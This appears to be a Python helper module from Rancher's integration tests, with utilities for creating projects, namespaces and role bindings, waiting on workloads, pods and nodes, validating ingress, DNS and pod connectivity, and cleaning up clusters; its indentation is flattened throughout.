def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
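# For example, compare_versions("1.17.4", "1.9.2") returns 1, compare_versions("2.4", "2.4")
# returns 0, and compare_versions("1.16.8", "1.17.0") returns -1. Note that this comparison
# assumes purely numeric dotted versions; suffixes such as "-rancher1" would have to be
# stripped before calling it.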
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
workload_list = deployment_list + daemonset_list + cronjob_list
wls = project_client.list_workload(namespaceId=ns.id).data
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
p = wait_for_pod_to_running(p_client, pod)
assert p["status"]["phase"] == "Running"
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
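# For example, execute_kubectl_cmd("get pods -n kube-system") shells out to
# "kubectl --kubeconfig <k8s_kube_config> get pods -n kube-system -o json" and returns the
# parsed JSON as a dict; json_out=False is used for commands (such as "exec") whose output
# is not JSON.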
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
while p.state != "running":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if 'k3s' in cluster.version["gitVersion"] and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
wait_for_wl_to_active(sys_p_client, wl)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id], "targetPort": "80"}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected)
def validate_dns_entry(pod, host, expected):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
cmd = 'ping -c 1 -W 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
assert ping_validation_pass is True
assert " 0% packet loss" in str(ping_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
cmd = "ping -c 1 -W 1 " + pod_ip
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
response = kubectl_pod_exec(pod1, cmd)
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
    for x in range(0, numofpods):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[]):
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=MACHINE_TIMEOUT)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=MACHINE_TIMEOUT)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
